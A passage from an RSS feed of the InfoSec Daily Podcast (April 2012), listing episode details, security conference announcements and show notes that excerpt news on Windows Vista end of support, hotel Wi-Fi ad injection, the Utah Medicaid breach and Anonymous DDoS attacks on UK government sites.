<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">All told, he said, &quot;it is about going back to basic security principles.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-642-end-of-support-donottrack-console-spies-global-payments-expulsion-anonchina-and-missing-the-basics/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3750/0/infosec-daily-podcast-episode-642.mp3" length="20647688" type="audio/mpeg" />
		<itunes:duration>0:42:58</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 642 for April 10, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 642 for April 10, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: http://www.computerworld.com/s/article/9225979/Microsoft_retires_Vista_Office_2007_from_mainstream_support_this_week?taxonomyId=125
Microsoft will shift Windows Vista and Office 2007 into what it calls extended support over the next two days.
Vista, the problem-plagued operating system that never really took hold among users, will exit mainstream support on Tuesday, April 10. According to Microsoft, Office 2007 leaves mainstream support today.
&#160;
In a product&#39;s extended support phrase, Microsoft continues to provide security patches to all users, but offers other fixes &#8212; such as reliability and stability updates &#8212; only to organizations that have signed support contracts with the company.
Just seven weeks ago, Microsoft quietly extended support for the consumer versions of Windows Vista &#8212; as well as Windows 7 &#8212; by five years to synchronize their support lifecycle with that of the comparable enterprise editions.
Previously, Microsoft had committed to supporting consumer software with security updates for just five years, not the 10 granted to business software.
Vista&#39;s last major update was Service Pack 2 (SP2), which debuted in May 2009. Microsoft shipped the third and final Office 2007 service pack, SP3, last October.
Windows Vista&#39;s share of in-use operating systems has fallen dramatically since Microsoft introduced Windows 7 in October 2009. By the calculations of Web metrics firm Net Applications, Vista now accounts for just 7.7% of all operating systems, and 8.3% of the machines running Windows.
Vista peaked at 19.1% in October 2009 and has been falling ever since. At the rate of its decline over the last 12 months, Vista will slip under the 5% bar in January 2013.
&#8230;.
Source: &#160;http://www.pcadvisor.co.uk/news/security/3349816/do-not-track-tools-hands-on-showdown
Online tracking is a hot topic these days, with the Obama administration and the Federal Trade Commission calling for tougher onlin[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 641 &#8211; Strange Wifi, Medicaid Hack, #OpTrialatHome, China Admits, and College Spies</title>
		<link>http://www.isdpodcast.com/episode-641-strange-wifi-medicaid-hack-optrialathome-china-admits-and-college-spies</link>
		<comments>http://www.isdpodcast.com/episode-641-strange-wifi-medicaid-hack-optrialathome-china-admits-and-college-spies#comments</comments>
		<pubDate>Tue, 10 Apr 2012 01:01:01 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3746</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 641 for April 6, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 641 for April 6, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://bits.blogs.nytimes.com/2012/04/06/courtyard-marriott-wifi/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://bits.blogs.nytimes.com/2012/04/06/courtyard-marriott-wifi/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Justin Watt, a Web engineer, was browsing the Web in his room at the Courtyard Marriott in Midtown Manhattan this week when he saw something strange. On his personal blog, a mysterious gap was appearing at the top of the page.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After some sleuthing, Mr. Watt, who has a background in developing Web advertising tools, realized that the quirk was not confined to his site. The hotel&rsquo;s Internet service was secretly injecting lines of code into every page he visited, code that could allow it to insert ads into any Web page without the knowledge of the site visitor or the page&rsquo;s creator. (He did not actually see any such ads.)</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mr. Watt posted about the discovery on his blog, and that soon spawned a conversation on Hacker News, a discussion site for tech topics, about the ethics of this technique. One commenter described it as &ldquo;icky,&rdquo; and another asked, &ldquo;Why aren&rsquo;t they putting ads in my pillow?&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mr. Watt had strong feelings about it himself. He said in an interview that he had never seen an Internet provider modifying Web pages that a person visits. &ldquo;Imagine the U.S.P.S., or FedEx, for that matter, opening your Amazon boxes and injecting ads into the packages,&rdquo; Mr. Watt said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A test of the Courtyard Marriott&rsquo;s wireless network on Friday verified Mr. Watt&rsquo;s claims. The code was embedded in the pages of several Web sites visited, including Reddit, GigaOM and TechMeme.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/security/medicaid-hacked-over-181000-records-and-25000-ssns-stolen/11432"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/security/medicaid-hacked-over-181000-records-and-25000-ssns-stolen/11432</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Utah Department of Health has been hacked. 181,604 Medicaid/CHIP recipients have had their personal information stolen. 25,096 have had their Social Security numbers (SSNs) compromised. &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Utah Department of Technology Services (</span><a href="http://dts.utah.gov/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">DTS</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) notified the Utah Department of Health (</span><a href="http://health.utah.gov/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">UDOH</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) on Monday the server that houses</span><a href="http://www.medicaid.gov/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Medicaid</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> claims was hacked. On Wednesday, the UDOH publicly announced the breach. On Friday, DTS revealed the damage: 181,604 Medicaid and Children&rsquo;s Health Insurance Plan (CHIP) recipients had their personal information stolen. Of those, 25,096 appear had their Social Security numbers (SSNs) compromised.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The agency is cooperating with law enforcement in a criminal investigation. The hackers, who are believed to be located in Eastern Europe, breached the server in question on March 30, 2012.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Wednesday, the DTS said information was accessed from approximately 24,000 claims. It turned out the hackers had made off with 24,000 files, and one single file can potentially contain claims information on hundreds of individuals. On Friday, the DTS thus confirmed the number of Medicaid clients affected was actually 181,604.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.csoonline.com/article/703788/anonymous-disrupts-uk-government-sites"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.csoonline.com/article/703788/anonymous-disrupts-uk-government-sites</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Three UK government websites, including one for the country&#39;s Prime Minister, were attacked by the hacker collective Anonymous late Saturday night in protest of extradition of British citizens to the United States and of a proposed law to broaden the snooping powers of the government there.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacktivists disrupted traffic at three sites &#8211;</span><a href="http://homeoffice.gov.uk/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">homeoffice.gov.uk</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (Home Office),</span><a href="http://www.number10.gov.uk/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">number10.gov.uk</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (Prime Minister&#39;s Office) and</span><a href="http://www.number10.gov.uk/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">justice.gov.uk</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (Ministry of Justice) &#8212; through distributed denial of service (DDoS) attacks.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DDoS attacks take a website offline by flooding it with more traffic than it can handle.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">All the government sites appeared to be functioning normally on Sunday morning.</span></p>
